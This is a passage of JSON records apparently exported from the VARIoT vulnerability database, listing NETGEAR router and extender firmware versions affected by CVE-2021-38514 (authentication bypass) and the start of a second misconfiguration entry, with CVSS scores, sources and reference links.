"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.62"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.62"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "rbw30",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.2.1.204"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.54"
},
{
"model": "wnr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "d7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.56"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "r6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.46"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.44"
},
{
"model": "ex2700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.52"
},
{
"model": "wndr4500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.72"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "rbk40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "r6020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.102"
},
{
"model": "d3600",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.28"
},
{
"model": "r7500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.38"
},
{
"model": "ex8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.180"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.28"
},
{
"model": "r6080",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.38"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.70"
},
{
"model": "d6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.86"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.86"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "wnr3500l",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.62"
},
{
"model": "r8000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.70"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.63"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "d6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.00.34"
},
{
"model": "r6300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.32"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "r8300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.88"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.128"
},
{
"model": "rbs40v",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.2.0.58"
},
{
"model": "rbs40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "jr6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "rbk50v",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.2.0.58"
},
{
"model": "xr500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.3.2.22"
},
{
"model": "ex3800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "rbr50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "dgnd2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "rbr40",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.3.1.64"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.8"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.34"
},
{
"model": "wnr2050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.62"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.76"
},
{
"model": "rbs50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.76"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.48"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.34"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.108"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.66"
},
{
"model": "dc112a",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.36"
},
{
"model": "ex6150",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.42"
},
{
"model": "rbk50",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "2.1.4.10"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.18"
},
{
"model": "r7100lg",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.52"
},
{
"model": "r7900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.4.1.30"
},
{
"model": "ex6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.136"
},
{
"model": "d8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.44"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.22"
},
{
"model": "d6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.72"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.24"
},
{
"model": "ex7300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.136"
},
{
"model": "wn2000rpt",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.32"
},
{
"model": "wn3000rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.78"
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"cve": "CVE-2021-38514",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "SINGLE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 4.0,
"confidentialityImpact": "PARTIAL",
"exploitabilityScore": 8.0,
"id": "CVE-2021-38514",
"impactScore": 2.9,
"integrityImpact": "NONE",
"severity": "MEDIUM",
"trust": 1.1,
"vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 2.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"exploitabilityScore": 1.2,
"id": "CVE-2021-38514",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
{
"attackComplexity": "LOW",
"attackVector": "ADJACENT",
"author": "cve@mitre.org",
"availabilityImpact": "NONE",
"baseScore": 2.4,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"exploitabilityScore": 0.9,
"id": "CVE-2021-38514",
"impactScore": 1.4,
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"trust": 1.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:A/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
}
],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2021-38514",
"trust": 1.0,
"value": "LOW"
},
{
"author": "cve@mitre.org",
"id": "CVE-2021-38514",
"trust": 1.0,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-202108-962",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULMON",
"id": "CVE-2021-38514",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"db": "NVD",
"id": "CVE-2021-38514"
},
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Certain NETGEAR devices are affected by authentication bypass. This affects D3600 prior to 1.0.0.72, D6000 prior to 1.0.0.72, D6100 prior to 1.0.0.63, D6200 prior to 1.1.00.34, D6220 prior to 1.0.0.48, D6400 prior to 1.0.0.86, D7000 prior to 1.0.1.70, D7000v2 prior to 1.0.0.52, D7800 prior to 1.0.1.56, D8500 prior to 1.0.3.44, DC112A prior to 1.0.0.42, DGN2200v4 prior to 1.0.0.108, DGND2200Bv4 prior to 1.0.0.108, EX2700 prior to 1.0.1.48, EX3700 prior to 1.0.0.76, EX3800 prior to 1.0.0.76, EX6000 prior to 1.0.0.38, EX6100 prior to 1.0.2.24, EX6100v2 prior to 1.0.1.76, EX6120 prior to 1.0.0.42, EX6130 prior to 1.0.0.28, EX6150v1 prior to 1.0.0.42, EX6150v2 prior to 1.0.1.76, EX6200 prior to 1.0.3.88, EX6200v2 prior to 1.0.1.72, EX6400 prior to 1.0.2.136, EX7000 prior to 1.0.0.66, EX7300 prior to 1.0.2.136, EX8000 prior to 1.0.1.180, RBK50 prior to 2.1.4.10, RBR50 prior to 2.1.4.10, RBS50 prior to 2.1.4.10, RBK40 prior to 2.1.4.10, RBR40 prior to 2.1.4.10, RBS40 prior to 2.1.4.10, RBW30 prior to 2.2.1.204, PR2000 prior to 1.0.0.28, R6020 prior to 1.0.0.38, R6080 prior to 1.0.0.38, R6050 prior to 1.0.1.18, JR6150 prior to 1.0.1.18, R6120 prior to 1.0.0.46, R6220 prior to 1.1.0.86, R6250 prior to 1.0.4.34, R6300v2 prior to 1.0.4.32, R6400 prior to 1.0.1.44, R6400v2 prior to 1.0.2.62, R6700 prior to 1.0.1.48, R6700v2 prior to 1.2.0.36, R6800 prior to 1.2.0.36, R6900v2 prior to 1.2.0.36, R6900 prior to 1.0.1.48, R7000 prior to 1.0.9.34, R6900P prior to 1.3.1.64, R7000P prior to 1.3.1.64, R7100LG prior to 1.0.0.48, R7300DST prior to 1.0.0.70, R7500v2 prior to 1.0.3.38, R7800 prior to 1.0.2.52, R7900 prior to 1.0.3.8, R8000 prior to 1.0.4.28, R7900P prior to 1.4.1.30, R8000P prior to 1.4.1.30, R8300 prior to 1.0.2.128, R8500 prior to 1.0.2.128, R9000 prior to 1.0.3.10, RBS40V prior to 2.2.0.58, RBK50V prior to 2.2.0.58, WN2000RPTv3 prior to 1.0.1.32, WN2500RPv2 prior to 1.0.1.54, WN3000RPv3 prior to 1.0.2.78, WN3100RPv2 prior to 1.0.0.66, WNDR3400v3 prior to 1.0.1.22, WNDR3700v4 prior to 1.0.2.102, WNDR4300v1 prior to 1.0.2.104, WNDR4300v2 prior to 1.0.0.56, WNDR4500v3 prior to 1.0.0.56, WNR2000v5 (R2000) prior to 1.0.0.66, WNR2020 prior to 1.1.0.62, WNR2050 prior to 1.1.0.62, WNR3500Lv2 prior to 1.2.0.62, and XR500 prior to 2.3.2.22.",
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
}
],
"trust": 0.1
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2021-38514",
"trust": 1.7
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2021-38514",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"id": "VAR-202108-1620",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 0.36876626681034474
},
"last_update_date": "2024-08-14T15:17:07.828000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Multiple Netgear Product access control error vulnerability fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=159356"
},
{
"title": "CVE-2021-38514",
"trust": 0.1,
"url": "https://github.com/AlAIAL90/CVE-2021-38514 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "NVD-CWE-noinfo",
"trust": 1.0
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.7,
"url": "https://kb.netgear.com/000063757/security-advisory-for-authentication-bypass-on-some-routers-extenders-and-wifi-systems-psv-2017-2449"
},
{
"trust": 0.6,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-38514"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/287.html"
},
{
"trust": 0.1,
"url": "https://github.com/alaial90/cve-2021-38514"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-11T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"date": "2021-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"date": "2021-08-11T00:15:15.663000",
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2021-08-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-38514"
},
{
"date": "2022-07-14T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202108-962"
},
{
"date": "2022-07-12T17:42:04.277000",
"db": "NVD",
"id": "CVE-2021-38514"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple Netgear Product Authorization Issue Vulnerability",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202108-962"
}
],
"trust": 0.6
}
}
var-202004-1636
Vulnerability from variot
plural NETGEAR An unspecified vulnerability exists in the device.Information may be obtained and tampered with. Certain NETGEAR devices are affected by incorrect configuration of security settings. This affects D1500 prior to 1.0.0.27, D500 prior to 1.0.0.27, D6100 prior to 1.0.0.57, D6220 prior to 1.0.0.40, D6400 prior to 1.0.0.74, D7000 prior to 1.0.1.60, D7800 prior to 1.0.1.34, D8500 prior to 1.0.3.39, DGN2200v4 prior to 1.0.0.94, DGN2200Bv4 prior to 1.0.0.94, EX2700 prior to 1.0.1.42, EX3700 prior to 1.0.0.64, EX3800 prior to 1.0.0.64, EX6000 prior to 1.0.0.24, EX6100 prior to 1.0.2.18, EX6120 prior to 1.0.0.32, EX6130 prior to 1.0.0.22, EX6150 prior to 1.0.0.34_1.0.70, EX6200 prior to 1.0.3.82_1.1.117, EX6400 prior to 1.0.1.78, EX7000 prior to 1.0.0.56, EX7300 prior to 1.0.1.78, JNR1010v2 prior to 1.1.0.42, JR6150 prior to 1.0.1.10, JWNR2010v5 prior to 1.1.0.42, PR2000 prior to 1.0.0.22, R6050 prior to 1.0.1.10, R6100 prior to 1.0.1.16, R6220 prior to 1.1.0.50, R6250 prior to 1.0.4.14, R6300v2 prior to 1.0.4.12, R6400v2 prior to 1.0.2.34, R6700 prior to 1.0.1.26, R6900 prior to 1.0.1.26, R6900P prior to 1.2.0.22, R7000 prior to 1.0.9.6, R7000P prior to 1.2.0.22, R7100LG prior to 1.0.0.40, R7300DST prior to 1.0.0.54, R7500 prior to 1.0.0.110, R7500v2 prior to 1.0.3.26, R7800 prior to 1.0.2.44, R7900 prior to 1.0.1.26, R8000 prior to 1.0.3.48, R8300 prior to 1.0.2.104, R8500 prior to 1.0.2.104, R9000 prior to 1.0.3.10, WN2000RPTv3 prior to 1.0.1.26, WN2500RPv2 prior to 1.0.1.46, WN3000RPv3 prior to 1.0.2.66, WN3100RPv2 prior to 1.0.0.56, WNDR3400v3 prior to 1.0.1.14, WNDR3700v4 prior to 1.0.2.96, WNDR3700v5 prior to 1.1.0.54, WNDR4300 prior to 1.0.2.98, WNDR4300v2 prior to 1.0.0.48, WNDR4500v3 prior to 1.0.0.48, WNR1000v4 prior to 1.1.0.42, WNR2000v5 prior to 1.0.0.64, WNR2020 prior to 1.1.0.42, and WNR2050 prior to 1.1.0.42
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202004-1636",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "ex6120",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.32"
},
{
"model": "d7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.60"
},
{
"model": "dgn2200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r6250",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.4.14"
},
{
"model": "ex6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.18"
},
{
"model": "pr2000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "wn3100rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "d6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.40"
},
{
"model": "jwnr2010",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "r8500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.104"
},
{
"model": "r6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.34"
},
{
"model": "r9000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.10"
},
{
"model": "d500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "wnr2020",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.42"
},
{
"model": "d1500",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.27"
},
{
"model": "r6700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.48"
},
{
"model": "r7000p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "ex3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.64"
},
{
"model": "r7300dst",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.54"
},
{
"model": "wndr3400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.14"
},
{
"model": "ex2700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.42"
},
{
"model": "d6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.57"
},
{
"model": "r6050",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.10"
},
{
"model": "r7800",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.44"
},
{
"model": "wn2500rp",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.46"
},
{
"model": "r6900p",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.2.0.22"
},
{
"model": "wndr4300",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.98"
},
{
"model": "ex6200",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.82_1.1.117"
},
{
"model": "dgn2200b",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.94"
},
{
"model": "r8000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.3.48"
},
{
"model": "ex6000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.24"
},
{
"model": "ex6130",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.22"
},
{
"model": "r6100",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.16"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.2.96"
},
{
"model": "wndr3700",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.54"
},
{
"model": "r7900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "ex6400",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.78"
},
{
"model": "r6900",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.1.26"
},
{
"model": "r6220",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.1.0.50"
},
{
"model": "ex7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.0.56"
},
{
"model": "r7000",
"scope": "lt",
"trust": 1.0,
"vendor": "netgear",
"version": "1.0.9.6"
},
{
"model": "r7100lg",
